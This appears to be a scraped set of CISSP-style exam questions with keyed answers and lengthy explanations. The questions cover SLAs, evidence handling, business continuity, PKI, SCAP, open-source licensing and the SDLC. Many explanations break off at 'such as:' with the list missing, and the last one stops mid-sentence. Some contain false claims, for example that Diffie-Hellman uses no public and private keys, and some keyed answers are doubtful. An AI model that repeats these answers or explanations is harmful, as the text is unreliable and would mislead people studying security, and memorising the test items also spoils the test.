An organization is found lacking the ability to properly establish performance indicators for its Web hosting solution during an audit. What would be the MOST probable cause?
Absence of a Business Intelligence (BI) solution
Inadequate cost modeling
Improper deployment of the Service-Oriented Architecture (SOA)
Insufficient Service Level Agreement (SLA)
Insufficient Service Level Agreement (SLA) would be the most probable cause for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit. A Web hosting solution is a service that provides the infrastructure, resources, and tools for hosting and maintaining a website or a web application on the internet. A Web hosting solution can offer various benefits, such as:
A Service Level Agreement (SLA) is a contract or an agreement that defines the expectations, responsibilities, and obligations of the parties involved in a service, such as the service provider and the service consumer. An SLA can include various components, such as:
Insufficient SLA would be the most probable cause for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit, because it could mean that the SLA does not include or specify the appropriate service level indicators or objectives for the Web hosting solution, or that the SLA does not provide or enforce the adequate service level reporting or penalties for the Web hosting solution. This could affect the ability of the organization to measure and assess the Web hosting solution quality, performance, and availability, and to identify and address any issues or risks in the Web hosting solution.
The other options are not the most probable causes for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit, but rather the factors that could affect or improve the Web hosting solution in other ways. Absence of a Business Intelligence (BI) solution is a factor that could affect the ability of the organization to analyze and utilize the data and information from the Web hosting solution, such as the web traffic, behavior, or conversion. A BI solution is a system that involves the collection, integration, processing, and presentation of the data and information from various sources, such as the Web hosting solution, to support the decision making and planning of the organization. However, absence of a BI solution is not the most probable cause for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit, because it does not affect the definition or specification of the performance indicators for the Web hosting solution, but rather the analysis or usage of the performance indicators for the Web hosting solution. Inadequate cost modeling is a factor that could affect the ability of the organization to estimate and optimize the cost and value of the Web hosting solution, such as the web hosting fees, maintenance costs, or return on investment. A cost model is a tool or a method that helps the organization to calculate and compare the cost and value of the Web hosting solution, and to identify and implement the best or most efficient Web hosting solution. However, inadequate cost modeling is not the most probable cause for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit, because it does not affect the definition or specification of the performance indicators for the Web hosting solution, but rather the estimation or optimization of the cost and value of the Web hosting solution. Improper deployment of the Service-Oriented Architecture (SOA) is a factor that could affect the ability of the organization to design and develop the Web hosting solution, such as the web services, components, or interfaces. A SOA is a software architecture that involves the modularization, standardization, and integration of the software components or services that provide the functionality or logic of the Web hosting solution. A SOA can offer various benefits, such as:
However, improper deployment of the SOA is not the most probable cause for an organization to lack the ability to properly establish performance indicators for its Web hosting solution during an audit, because it does not affect the definition or specification of the performance indicators for the Web hosting solution, but rather the design or development of the Web hosting solution.
What should be the FIRST action to protect the chain of evidence when a desktop computer is involved?
Take the computer to a forensic lab
Make a copy of the hard drive
Start documenting
Turn off the computer
Making a copy of the hard drive should be the first action to protect the chain of evidence when a desktop computer is involved. A chain of evidence, also known as a chain of custody, is a process that documents and preserves the integrity and authenticity of the evidence collected from a crime scene, such as a desktop computer. A chain of evidence should include information such as:
Making a copy of the hard drive should be the first action to protect the chain of evidence when a desktop computer is involved, because it can ensure that the original hard drive is not altered, damaged, or destroyed during the forensic analysis, and that the copy can be used as a reliable and admissible source of evidence. Making a copy of the hard drive should also involve using a write blocker, which is a device or a software that prevents any modification or deletion of the data on the hard drive, and generating a hash value, which is a unique and fixed identifier that can verify the integrity and consistency of the data on the hard drive.
The other options are not the first actions to protect the chain of evidence when a desktop computer is involved, but rather actions that should be done after or along with making a copy of the hard drive. Taking the computer to a forensic lab is an action that should be done after making a copy of the hard drive, because it can ensure that the computer is transported and stored in a secure and controlled environment, and that the forensic analysis is conducted by qualified and authorized personnel. Starting documenting is an action that should be done along with making a copy of the hard drive, because it can ensure that the chain of evidence is maintained and recorded throughout the forensic process, and that the evidence can be traced and verified. Turning off the computer is an action that should be done after making a copy of the hard drive, because it can ensure that the computer is powered down and disconnected from any network or device, and that the computer is protected from any further damage or tampering.
What is the PRIMARY reason for implementing change management?
Certify and approve releases to the environment
Provide version rollbacks for system changes
Ensure that all applications are approved
Ensure accountability for changes to the environment
Ensuring accountability for changes to the environment is the primary reason for implementing change management. Change management is a process that ensures that any changes to the system or network environment, such as the hardware, software, configuration, or documentation, are planned, approved, implemented, and documented in a controlled and consistent manner. Change management can provide several benefits, such as:
Ensuring accountability for changes to the environment is the primary reason for implementing change management, because it can ensure that the changes are authorized, justified, and traceable, and that the parties involved in the changes are responsible and accountable for their actions and results. Accountability can also help to deter or detect any unauthorized or malicious changes that might compromise the system or network environment.
The other options are not the primary reasons for implementing change management, but rather secondary or specific reasons for different aspects or phases of change management. Certifying and approving releases to the environment is a reason for implementing change management, but it is more relevant for the approval phase of change management, which is the phase that involves reviewing and validating the changes and their impacts, and granting or denying the permission to proceed with the changes. Providing version rollbacks for system changes is a reason for implementing change management, but it is more relevant for the implementation phase of change management, which is the phase that involves executing and monitoring the changes and their effects, and providing the backup and recovery options for the changes. Ensuring that all applications are approved is a reason for implementing change management, but it is more relevant for the application changes, which are the changes that affect the software components or services that provide the functionality or logic of the system or network environment.
Recovery strategies of a Disaster Recovery planning (DRIP) MUST be aligned with which of the following?
Hardware and software compatibility issues
Applications’ critically and downtime tolerance
Budget constraints and requirements
Cost/benefit analysis and business objectives
Recovery strategies of a Disaster Recovery planning (DRP) must be aligned with the cost/benefit analysis and business objectives. A DRP is a part of a BCP/DRP that focuses on restoring the normal operation of the organization’s IT systems and infrastructure after a disruption or disaster. A DRP should include various components, such as:
Recovery strategies of a DRP must be aligned with the cost/benefit analysis and business objectives, because it can ensure that the DRP is feasible and suitable, and that it can achieve the desired outcomes and objectives in a cost-effective and efficient manner. A cost/benefit analysis is a technique that compares the costs and benefits of different recovery strategies, and determines the optimal one that provides the best value for money. A business objective is a goal or a target that the organization wants to achieve through its IT systems and infrastructure, such as increasing the productivity, profitability, or customer satisfaction. A recovery strategy that is aligned with the cost/benefit analysis and business objectives can help to:
The other options are not the factors that the recovery strategies of a DRP must be aligned with, but rather factors that should be considered or addressed when developing or implementing the recovery strategies of a DRP. Hardware and software compatibility issues are factors that should be considered when developing the recovery strategies of a DRP, because they can affect the functionality and interoperability of the IT systems and infrastructure, and may require additional resources or adjustments to resolve them. Applications’ criticality and downtime tolerance are factors that should be addressed when implementing the recovery strategies of a DRP, because they can determine the priority and urgency of the recovery for different applications, and may require different levels of recovery objectives and resources. Budget constraints and requirements are factors that should be considered when developing the recovery strategies of a DRP, because they can limit the availability and affordability of the IT resources and funds for the recovery, and may require trade-offs or compromises to balance them.
When is a Business Continuity Plan (BCP) considered to be valid?
When it has been validated by the Business Continuity (BC) manager
When it has been validated by the board of directors
When it has been validated by all threat scenarios
When it has been validated by realistic exercises
A Business Continuity Plan (BCP) is considered to be valid when it has been validated by realistic exercises. A BCP is a part of a BCP/DRP that focuses on ensuring the continuous operation of the organization’s critical business functions and processes during and after a disruption or disaster. A BCP should include various components, such as:
A BCP is considered to be valid when it has been validated by realistic exercises, because it can ensure that the BCP is practical and applicable, and that it can achieve the desired outcomes and objectives in a real-life scenario. Realistic exercises are a type of testing, training, and exercises that involve performing and practicing the BCP with the relevant stakeholders, using simulated or hypothetical scenarios, such as a fire drill, a power outage, or a cyberattack. Realistic exercises can provide several benefits, such as:
The other options are not the criteria for considering a BCP to be valid, but rather the steps or parties that are involved in developing or approving a BCP. When it has been validated by the Business Continuity (BC) manager is not a criterion for considering a BCP to be valid, but rather a step that is involved in developing a BCP. The BC manager is the person who is responsible for overseeing and coordinating the BCP activities and processes, such as the business impact analysis, the recovery strategies, the BCP document, the testing, training, and exercises, and the maintenance and review. The BC manager can validate the BCP by reviewing and verifying the BCP components and outcomes, and ensuring that they meet the BCP standards and objectives. However, the validation by the BC manager is not enough to consider the BCP to be valid, as it does not test or demonstrate the BCP in a realistic scenario. When it has been validated by the board of directors is not a criterion for considering a BCP to be valid, but rather a party that is involved in approving a BCP. The board of directors is the group of people who are elected by the shareholders to represent their interests and to oversee the strategic direction and governance of the organization. The board of directors can approve the BCP by endorsing and supporting the BCP components and outcomes, and allocating the necessary resources and funds for the BCP. However, the approval by the board of directors is not enough to consider the BCP to be valid, as it does not test or demonstrate the BCP in a realistic scenario. When it has been validated by all threat scenarios is not a criterion for considering a BCP to be valid, but rather an unrealistic or impossible expectation for validating a BCP. A threat scenario is a description or a simulation of a possible or potential disruption or disaster that might affect the organization’s critical business functions and processes, such as a natural hazard, a human error, or a technical failure. A threat scenario can be used to test and validate the BCP by measuring and evaluating the BCP’s performance and effectiveness in responding and recovering from the disruption or disaster. However, it is not possible or feasible to validate the BCP by all threat scenarios, as there are too many or unknown threat scenarios that might occur, and some threat scenarios might be too severe or complex to simulate or test. Therefore, the BCP should be validated by the most likely or relevant threat scenarios, and not by all threat scenarios.
Which of the following types of business continuity tests includes assessment of resilience to internal and external risks without endangering live operations?
Walkthrough
Simulation
Parallel
White box
Simulation is the type of business continuity test that includes assessment of resilience to internal and external risks without endangering live operations. Business continuity is the ability of an organization to maintain or resume its critical functions and operations in the event of a disruption or disaster. Business continuity testing is the process of evaluating and validating the effectiveness and readiness of the business continuity plan (BCP) and the disaster recovery plan (DRP) through various methods and scenarios. Business continuity testing can provide several benefits, such as:
There are different types of business continuity tests, depending on the scope, purpose, and complexity of the test. Some of the common types are:
Simulation is the type of business continuity test that includes assessment of resilience to internal and external risks without endangering live operations, because it can simulate various types of risks, such as natural, human, or technical, and assess how the organization and its systems can cope and recover from them, without actually causing any harm or disruption to the live operations. Simulation can also help to identify and mitigate any potential risks that might affect the live operations, and to improve the resilience and preparedness of the organization and its systems.
The other options are not the types of business continuity tests that include assessment of resilience to internal and external risks without endangering live operations, but rather types that have other objectives or effects. Walkthrough is a type of business continuity test that does not include assessment of resilience to internal and external risks, but rather a review and discussion of the BCP and DRP, without any actual testing or practice. Parallel is a type of business continuity test that does not endanger live operations, but rather maintains them, while activating and operating the alternate site or system. Full interruption is a type of business continuity test that does endanger live operations, by shutting them down and transferring them to the alternate site or system.
Which security service is served by the process of encryption plaintext with the sender’s private key and decrypting cipher text with the sender’s public key?
Confidentiality
Integrity
Identification
Availability
The security service that is served by the process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key is identification. Identification is the process of verifying the identity of a person or entity that claims to be who or what it is. Identification can be achieved by using public key cryptography and digital signatures, which are based on the process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key. This process works as follows:
The process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key serves identification because it ensures that only the sender can produce a valid ciphertext that can be decrypted by the receiver, and that the receiver can verify the sender’s identity by using the sender’s public key. This process also provides non-repudiation, which means that the sender cannot deny sending the message or the receiver cannot deny receiving the message, as the ciphertext serves as a proof of origin and delivery.
The other options are not the security services that are served by the process of encrypting plaintext with the sender’s private key and decrypting ciphertext with the sender’s public key. Confidentiality is the process of ensuring that the message is only readable by the intended parties, and it is achieved by encrypting plaintext with the receiver’s public key and decrypting ciphertext with the receiver’s private key. Integrity is the process of ensuring that the message is not modified or corrupted during transmission, and it is achieved by using hash functions and message authentication codes. Availability is the process of ensuring that the message is accessible and usable by the authorized parties, and it is achieved by using redundancy, backup, and recovery mechanisms.
The use of private and public encryption keys is fundamental in the implementation of which of the following?
Diffie-Hellman algorithm
Secure Sockets Layer (SSL)
Advanced Encryption Standard (AES)
Message Digest 5 (MD5)
The use of private and public encryption keys is fundamental in the implementation of Secure Sockets Layer (SSL). SSL is a protocol that provides secure communication over the Internet by using public key cryptography and digital certificates. SSL works as follows:
The use of private and public encryption keys is fundamental in the implementation of SSL because it enables the authentication of the parties, the establishment of the shared secret key, and the protection of the data from eavesdropping, tampering, and replay attacks.
The other options are not protocols or algorithms that use private and public encryption keys in their implementation. Diffie-Hellman algorithm is a method for generating a shared secret key between two parties, but it does not use private and public encryption keys, but rather public and private parameters. Advanced Encryption Standard (AES) is a symmetric encryption algorithm that uses the same key for encryption and decryption, but it does not use private and public encryption keys, but rather a single secret key. Message Digest 5 (MD5) is a hash function that produces a fixed-length output from a variable-length input, but it does not use private and public encryption keys, but rather a one-way mathematical function.
Which of the following is the PRIMARY risk with using open source software in a commercial software construction?
Lack of software documentation
License agreements requiring release of modified code
Expiration of the license agreement
Costs associated with support of the software
The primary risk with using open source software in a commercial software construction is license agreements requiring release of modified code. Open source software is software that uses publicly available source code, which can be seen, modified, and distributed by anyone. Open source software has some advantages, such as being affordable and flexible, but it also has some disadvantages, such as being potentially insecure or unsupported.
One of the main disadvantages of using open source software in a commercial software construction is the license agreements that govern the use and distribution of the open source software. License agreements are legal contracts that specify the rights and obligations of the parties involved in the software, such as the original authors, the developers, and the users. License agreements can vary in terms of their terms and conditions, such as the scope, the duration, or the fees of the software.
Some of the common types of license agreements for open source software are:
The primary risk with using open source software in a commercial software construction is license agreements requiring release of modified code, which are usually associated with copyleft licenses. This means that if a commercial software construction uses or incorporates open source software that is licensed under a copyleft license, then it must also release its own source code and any modifications or derivatives of it, under the same or compatible copyleft license. This can pose a significant risk for the commercial software construction, as it may lose its competitive advantage, intellectual property, or revenue, by disclosing its source code and allowing others to use, modify, or distribute it.
The other options are not the primary risks with using open source software in a commercial software construction, but rather secondary or minor risks that may or may not apply to the open source software. Lack of software documentation is a secondary risk with using open source software in a commercial software construction, as it may affect the quality, usability, or maintainability of the open source software, but it does not necessarily affect the rights or obligations of the commercial software construction. Expiration of the license agreement is a minor risk with using open source software in a commercial software construction, as it may affect the availability or continuity of the open source software, but it is unlikely to happen, as most open source software licenses are perpetual or indefinite. Costs associated with support of the software is a secondary risk with using open source software in a commercial software construction, as it may affect the reliability, security, or performance of the open source software, but it can be mitigated or avoided by choosing the open source software that has adequate or alternative support options.
What is the second phase of Public Key Infrastructure (PKI) key/certificate life-cycle management?
Implementation Phase
Initialization Phase
Cancellation Phase
Issued Phase
The second phase of Public Key Infrastructure (PKI) key/certificate life-cycle management is the initialization phase. PKI is a system that uses public key cryptography and digital certificates to provide authentication, confidentiality, integrity, and non-repudiation for electronic transactions. PKI key/certificate life-cycle management is the process of managing the creation, distribution, usage, storage, revocation, and expiration of keys and certificates in a PKI system. The key/certificate life-cycle management consists of six phases: pre-certification, initialization, certification, operational, suspension, and termination. The initialization phase is the second phase, where the key pair and the certificate request are generated by the end entity or the registration authority (RA). The initialization phase involves the following steps:
The other options are not the second phase of PKI key/certificate life-cycle management, but rather other phases. The implementation phase is not a phase of PKI key/certificate life-cycle management, but rather a phase of PKI system deployment, where the PKI components and policies are installed and configured. The cancellation phase is not a phase of PKI key/certificate life-cycle management, but rather a possible outcome of the termination phase, where the key pair and the certificate are permanently revoked and deleted. The issued phase is not a phase of PKI key/certificate life-cycle management, but rather a possible outcome of the certification phase, where the CA verifies and approves the certificate request and issues the certificate to the end entity or the RA.
Which technique can be used to make an encryption scheme more resistant to a known plaintext attack?
Hashing the data before encryption
Hashing the data after encryption
Compressing the data after encryption
Compressing the data before encryption
Compressing the data before encryption is a technique that can be used to make an encryption scheme more resistant to a known plaintext attack. A known plaintext attack is a type of cryptanalysis where the attacker has access to some pairs of plaintext and ciphertext encrypted with the same key, and tries to recover the key or decrypt other ciphertexts. A known plaintext attack can exploit the statistical properties or patterns of the plaintext or the ciphertext to reduce the search space or guess the key. Compressing the data before encryption can reduce the redundancy and increase the entropy of the plaintext, making it harder for the attacker to find any correlations or similarities between the plaintext and the ciphertext. Compressing the data before encryption can also reduce the size of the plaintext, making it more difficult for the attacker to obtain enough plaintext-ciphertext pairs for a successful attack.
The other options are not techniques that can be used to make an encryption scheme more resistant to a known plaintext attack, but rather techniques that can introduce other security issues or inefficiencies. Hashing the data before encryption is not a useful technique, as hashing is a one-way function that cannot be reversed, and the encrypted hash cannot be decrypted to recover the original data. Hashing the data after encryption is also not a useful technique, as hashing does not add any security to the encryption, and the hash can be easily computed by anyone who has access to the ciphertext. Compressing the data after encryption is not a recommended technique, as compression algorithms usually work better on uncompressed data, and compressing the ciphertext can introduce errors or vulnerabilities that can compromise the encryption.
Who in the organization is accountable for classification of data information assets?
Data owner
Data architect
Chief Information Security Officer (CISO)
Chief Information Officer (CIO)
The person in the organization who is accountable for the classification of data information assets is the data owner. The data owner is the person or entity that has the authority and responsibility for the creation, collection, processing, and disposal of a set of data. The data owner is also responsible for defining the purpose, value, and classification of the data, as well as the security requirements and controls for the data. The data owner should be able to determine the impact of the data on the mission of the organization, which means assessing the potential consequences of losing, compromising, or disclosing the data. The impact of the data on the mission of the organization is one of the main criteria for data classification, which helps to establish the appropriate level of protection and handling for the data. The data owner should also ensure that the data is properly labeled, stored, accessed, shared, and destroyed according to the data classification policy and procedures.
The other options are not the persons in the organization who are accountable for the classification of data information assets, but rather persons who have other roles or functions related to data management. The data architect is the person or entity that designs and models the structure, format, and relationships of the data, as well as the data standards, specifications, and lifecycle. The data architect supports the data owner by providing technical guidance and expertise on the data architecture and quality. The Chief Information Security Officer (CISO) is the person or entity that oversees the security strategy, policies, and programs of the organization, as well as the security performance and incidents. The CISO supports the data owner by providing security leadership and governance, as well as ensuring the compliance and alignment of the data security with the organizational objectives and regulations. The Chief Information Officer (CIO) is the person or entity that manages the information technology (IT) resources and services of the organization, as well as the IT strategy and innovation. The CIO supports the data owner by providing IT management and direction, as well as ensuring the availability, reliability, and scalability of the IT infrastructure and applications.
Which component of the Security Content Automation Protocol (SCAP) specification contains the data required to estimate the severity of vulnerabilities identified automated vulnerability assessments?
Common Vulnerabilities and Exposures (CVE)
Common Vulnerability Scoring System (CVSS)
Asset Reporting Format (ARF)
Open Vulnerability and Assessment Language (OVAL)
The component of the Security Content Automation Protocol (SCAP) specification that contains the data required to estimate the severity of vulnerabilities identified by automated vulnerability assessments is the Common Vulnerability Scoring System (CVSS). CVSS is a framework that provides a standardized and objective way to measure and communicate the characteristics and impacts of vulnerabilities. CVSS consists of three metric groups: base, temporal, and environmental. The base metric group captures the intrinsic and fundamental properties of a vulnerability that are constant over time and across user environments. The temporal metric group captures the characteristics of a vulnerability that change over time, such as the availability and effectiveness of exploits, patches, and workarounds. The environmental metric group captures the characteristics of a vulnerability that are relevant and unique to a user’s environment, such as the configuration and importance of the affected system. Each metric group has a set of metrics that are assigned values based on the vulnerability’s attributes. The values are then combined using a formula to produce a numerical score that ranges from 0 to 10, where 0 means no impact and 10 means critical impact. The score can also be translated into a qualitative rating that ranges from none to low, medium, high, and critical. CVSS provides a consistent and comprehensive way to estimate the severity of vulnerabilities and prioritize their remediation.
The other options are not components of the SCAP specification that contain the data required to estimate the severity of vulnerabilities identified by automated vulnerability assessments, but rather components that serve other purposes. Common Vulnerabilities and Exposures (CVE) is a component that provides a standardized and unique identifier and description for each publicly known vulnerability. CVE facilitates the sharing and comparison of vulnerability information across different sources and tools. Asset Reporting Format (ARF) is a component that provides a standardized and extensible format for expressing the information about the assets and their characteristics, such as configuration, vulnerabilities, and compliance. ARF enables the aggregation and correlation of asset information from different sources and tools. Open Vulnerability and Assessment Language (OVAL) is a component that provides a standardized and expressive language for defining and testing the state of a system for the presence of vulnerabilities, configuration issues, patches, and other aspects. OVAL enables the automation and interoperability of vulnerability assessment and management.
Which of the following mobile code security models relies only on trust?
Code signing
Class authentication
Sandboxing
Type safety
Code signing is the mobile code security model that relies only on trust. Mobile code is a type of software that can be transferred from one system to another and executed without installation or compilation. Mobile code can be used for various purposes, such as web applications, applets, scripts, macros, etc. Mobile code can also pose various security risks, such as malicious code, unauthorized access, data leakage, etc. Mobile code security models are the techniques that are used to protect the systems and users from the threats of mobile code. Code signing is a mobile code security model that relies only on trust, which means that the security of the mobile code depends on the reputation and credibility of the code provider. Code signing works as follows:
Code signing relies only on trust because it does not enforce any security restrictions or controls on the mobile code, but rather leaves the decision to the code consumer. Code signing also does not guarantee the quality or functionality of the mobile code, but rather the authenticity and integrity of the code provider. Code signing can be effective if the code consumer knows and trusts the code provider, and if the code provider follows the security standards and best practices. However, code signing can also be ineffective if the code consumer is unaware or careless of the code provider, or if the code provider is compromised or malicious.
The other options are not mobile code security models that rely only on trust, but rather on other techniques that limit or isolate the mobile code. Class authentication is a mobile code security model that verifies the permissions and capabilities of the mobile code based on its class or type, and allows or denies the execution of the mobile code accordingly. Sandboxing is a mobile code security model that executes the mobile code in a separate and restricted environment, and prevents the mobile code from accessing or affecting the system resources or data. Type safety is a mobile code security model that checks the validity and consistency of the mobile code, and prevents the mobile code from performing illegal or unsafe operations.
All of the following items should be included in a Business Impact Analysis (BIA) questionnaire EXCEPT questions that
determine the risk of a business interruption occurring
determine the technological dependence of the business processes
Identify the operational impacts of a business interruption
Identify the financial impacts of a business interruption
A Business Impact Analysis (BIA) is a process that identifies and evaluates the potential effects of natural and man-made disasters on business operations. The BIA questionnaire is a tool that collects information from business process owners and stakeholders about the criticality, dependencies, recovery objectives, and resources of their processes. The BIA questionnaire should include questions that:
The BIA questionnaire should not include questions that determine the risk of a business interruption occurring, as this is part of the risk assessment process, which is a separate activity from the BIA. The risk assessment process identifies and analyzes the threats and vulnerabilities that could cause a business interruption, and estimates the likelihood and impact of such events. The risk assessment process also evaluates the existing controls and mitigation strategies, and recommends additional measures to reduce the risk to an acceptable level.
Intellectual property rights are PRIMARY concerned with which of the following?
Owner’s ability to realize financial gain
Owner’s ability to maintain copyright
Right of the owner to enjoy their creation
Right of the owner to control delivery method
Intellectual property rights are primarily concerned with the owner’s ability to realize financial gain from their creation. Intellectual property is a category of intangible assets that are the result of human creativity and innovation, such as inventions, designs, artworks, literature, music, software, etc. Intellectual property rights are the legal rights that grant the owner the exclusive control over the use, reproduction, distribution, and modification of their intellectual property. Intellectual property rights aim to protect the owner’s interests and incentives, and to reward them for their contribution to the society and economy.
The other options are not the primary concern of intellectual property rights, but rather the secondary or incidental benefits or aspects of them. The owner’s ability to maintain copyright is a means of enforcing intellectual property rights, but not the end goal of them. The right of the owner to enjoy their creation is a personal or moral right, but not a legal or economic one. The right of the owner to control the delivery method is a specific or technical aspect of intellectual property rights, but not a general or fundamental one.
A company whose Information Technology (IT) services are being delivered from a Tier 4 data center, is preparing a companywide Business Continuity Planning (BCP). Which of the following failures should the IT manager be concerned with?
Application
Storage
Power
Network
A company whose IT services are being delivered from a Tier 4 data center should be most concerned with application failures when preparing a companywide BCP. A BCP is a document that describes how an organization will continue its critical business functions in the event of a disruption or disaster. A BCP should include a risk assessment, a business impact analysis, a recovery strategy, and a testing and maintenance plan.
A Tier 4 data center is the highest level of data center classification, according to the Uptime Institute. A Tier 4 data center has the highest level of availability, reliability, and fault tolerance, as it has multiple and independent paths for power and cooling, and redundant and backup components for all systems. A Tier 4 data center has an uptime rating of 99.995%, which means it can only experience 0.4 hours of downtime per year. Therefore, the likelihood of a power, storage, or network failure in a Tier 4 data center is very low, and the impact of such a failure would be minimal, as the data center can quickly switch to alternative sources or routes.
However, a Tier 4 data center cannot prevent or mitigate application failures, which are caused by software bugs, configuration errors, or malicious attacks. Application failures can affect the functionality, performance, or security of the IT services, and cause data loss, corruption, or breach. Therefore, the IT manager should be most concerned with application failures when preparing a BCP, and ensure that the applications are properly designed, tested, updated, and monitored.
Which of the following types of technologies would be the MOST cost-effective method to provide a reactive control for protecting personnel in public areas?
Install mantraps at the building entrances
Enclose the personnel entry area with polycarbonate plastic
Supply a duress alarm for personnel exposed to the public
Hire a guard to protect the public area
Supplying a duress alarm for personnel exposed to the public is the most cost-effective method to provide a reactive control for protecting personnel in public areas. A duress alarm is a device that allows a person to signal for help in case of an emergency, such as an attack, a robbery, or a medical condition. A duress alarm can be activated by pressing a button, pulling a cord, or speaking a code word. A duress alarm can alert security personnel, law enforcement, or other responders to the location and nature of the emergency, and initiate appropriate actions. A duress alarm is a reactive control because it responds to an incident after it has occurred, rather than preventing it from happening.
The other options are not as cost-effective as supplying a duress alarm, as they involve more expensive or complex technologies or resources. Installing mantraps at the building entrances is a preventive control that restricts the access of unauthorized persons to the facility, but it also requires more space, maintenance, and supervision. Enclosing the personnel entry area with polycarbonate plastic is a preventive control that protects the personnel from physical attacks, but it also reduces the visibility and ventilation of the area. Hiring a guard to protect the public area is a deterrent control that discourages potential attackers, but it also involves paying wages, benefits, and training costs.
An important principle of defense in depth is that achieving information security requires a balanced focus on which PRIMARY elements?
Development, testing, and deployment
Prevention, detection, and remediation
People, technology, and operations
Certification, accreditation, and monitoring
An important principle of defense in depth is that achieving information security requires a balanced focus on the primary elements of people, technology, and operations. People are the users, administrators, managers, and other stakeholders who are involved in the security process. They need to be aware, trained, motivated, and accountable for their security roles and responsibilities. Technology is the hardware, software, network, and other tools that are used to implement the security controls and measures. They need to be selected, configured, updated, and monitored according to the security standards and best practices. Operations are the policies, procedures, processes, and activities that are performed to achieve the security objectives and requirements. They need to be documented, reviewed, audited, and improved continuously to ensure their effectiveness and efficiency.
The other options are not the primary elements of defense in depth, but rather the phases, functions, or outcomes of the security process. Development, testing, and deployment are the phases of the security life cycle, which describes how security is integrated into the system development process. Prevention, detection, and remediation are the functions of the security management, which describes how security is maintained and improved over time. Certification, accreditation, and monitoring are the outcomes of the security evaluation, which describes how security is assessed and verified against the criteria and standards.
What is the MOST important consideration from a data security perspective when an organization plans to relocate?
Ensure the fire prevention and detection systems are sufficient to protect personnel
Review the architectural plans to determine how many emergency exits are present
Conduct a gap analysis of a new facilities against existing security requirements
Revise the Disaster Recovery and Business Continuity (DR/BC) plan
When an organization plans to relocate, the most important consideration from a data security perspective is to conduct a gap analysis of the new facilities against the existing security requirements. A gap analysis is a process that identifies and evaluates the differences between the current state and the desired state of a system or a process. In this case, the gap analysis would compare the security controls and measures implemented in the old and new locations, and identify any gaps or weaknesses that need to be addressed. The gap analysis would also help to determine the costs and resources needed to implement the necessary security improvements in the new facilities.
The other options are not as important as conducting a gap analysis, as they do not directly address the data security risks associated with relocation. Ensuring the fire prevention and detection systems are sufficient to protect personnel is a safety issue, not a data security issue. Reviewing the architectural plans to determine how many emergency exits are present is also a safety issue, not a data security issue. Revising the Disaster Recovery and Business Continuity (DR/BC) plan is a good practice, but it is not a preventive measure, rather a reactive one. A DR/BC plan is a document that outlines how an organization will recover from a disaster and resume its normal operations. A DR/BC plan should be updated regularly, not only when relocating.
Which of the following represents the GREATEST risk to data confidentiality?
Network redundancies are not implemented
Security awareness training is not completed
Backup tapes are generated unencrypted
Users have administrative privileges
Generating backup tapes unencrypted represents the greatest risk to data confidentiality, as it exposes the data to unauthorized access or disclosure if the tapes are lost, stolen, or intercepted. Backup tapes are often stored off-site or transported to remote locations, which increases the chances of them falling into the wrong hands. If the backup tapes are unencrypted, anyone who obtains them can read the data without any difficulty. Therefore, backup tapes should always be encrypted using strong algorithms and keys, and the keys should be protected and managed separately from the tapes.
The other options do not pose as much risk to data confidentiality as generating backup tapes unencrypted. Network redundancies are not implemented will affect the availability and reliability of the network, but not necessarily the confidentiality of the data. Security awareness training is not completed will increase the likelihood of human errors or negligence that could compromise the data, but not as directly as generating backup tapes unencrypted. Users have administrative privileges will grant users more access and control over the system and the data, but not as widely as generating backup tapes unencrypted.
When assessing an organization’s security policy according to standards established by the International Organization for Standardization (ISO) 27001 and 27002, when can management responsibilities be defined?
Only when assets are clearly defined
Only when standards are defined
Only when controls are put in place
Only procedures are defined
When assessing an organization’s security policy according to standards established by the ISO 27001 and 27002, management responsibilities can be defined only when standards are defined. Standards are the specific rules, guidelines, or procedures that support the implementation of the security policy. Standards define the minimum level of security that must be achieved by the organization, and provide the basis for measuring compliance and performance. Standards also assign roles and responsibilities to different levels of management and staff, and specify the reporting and escalation procedures.
Management responsibilities are the duties and obligations that managers have to ensure the effective and efficient execution of the security policy and standards. Management responsibilities include providing leadership, direction, support, and resources for the security program, establishing and communicating the security objectives and expectations, ensuring compliance with the legal and regulatory requirements, monitoring and reviewing the security performance and incidents, and initiating corrective and preventive actions when needed.
Management responsibilities cannot be defined without standards, as standards provide the framework and criteria for defining what managers need to do and how they need to do it. Management responsibilities also depend on the scope and complexity of the security policy and standards, which may vary depending on the size, nature, and context of the organization. Therefore, standards must be defined before management responsibilities can be defined.
The other options are not correct, as they are not prerequisites for defining management responsibilities. Assets are the resources that need to be protected by the security policy and standards, but they do not determine the management responsibilities. Controls are the measures that are implemented to reduce the security risks and achieve the security objectives, but they do not determine the management responsibilities. Procedures are the detailed instructions that describe how to perform the security tasks and activities, but they do not determine the management responsibilities.
Which of the following actions will reduce risk to a laptop before traveling to a high risk area?
Examine the device for physical tampering
Implement more stringent baseline configurations
Purge or re-image the hard disk drive
Change access codes
Purging or re-imaging the hard disk drive of a laptop before traveling to a high risk area will reduce the risk of data compromise or theft in case the laptop is lost, stolen, or seized by unauthorized parties. Purging or re-imaging the hard disk drive will erase all the data and applications on the laptop, leaving only the operating system and the essential software. This will minimize the exposure of sensitive or confidential information that could be accessed by malicious actors. Purging or re-imaging the hard disk drive should be done using secure methods that prevent data recovery, such as overwriting, degaussing, or physical destruction.
The other options will not reduce the risk to the laptop as effectively as purging or re-imaging the hard disk drive. Examining the device for physical tampering will only detect if the laptop has been compromised after the fact, but will not prevent it from happening. Implementing more stringent baseline configurations will improve the security settings and policies of the laptop, but will not protect the data if the laptop is bypassed or breached. Changing access codes will make it harder for unauthorized users to log in to the laptop, but will not prevent them from accessing the data if they use other methods, such as booting from a removable media or removing the hard disk drive.
When in the Software Development Life Cycle (SDLC) MUST software security functional requirements be defined?
After the system preliminary design has been developed and the data security categorization has been performed
After the vulnerability analysis has been performed and before the system detailed design begins
After the system preliminary design has been developed and before the data security categorization begins
After the business functional analysis and the data security categorization have been performed
Software security functional requirements must be defined after the business functional analysis and the data security categorization have been performed in the Software Development Life Cycle (SDLC). The SDLC is a process that involves planning, designing, developing, testing, deploying, operating, and maintaining a system, using various models and methodologies, such as waterfall, spiral, agile, or DevSecOps. The SDLC can be divided into several phases, each with its own objectives and activities, such as:
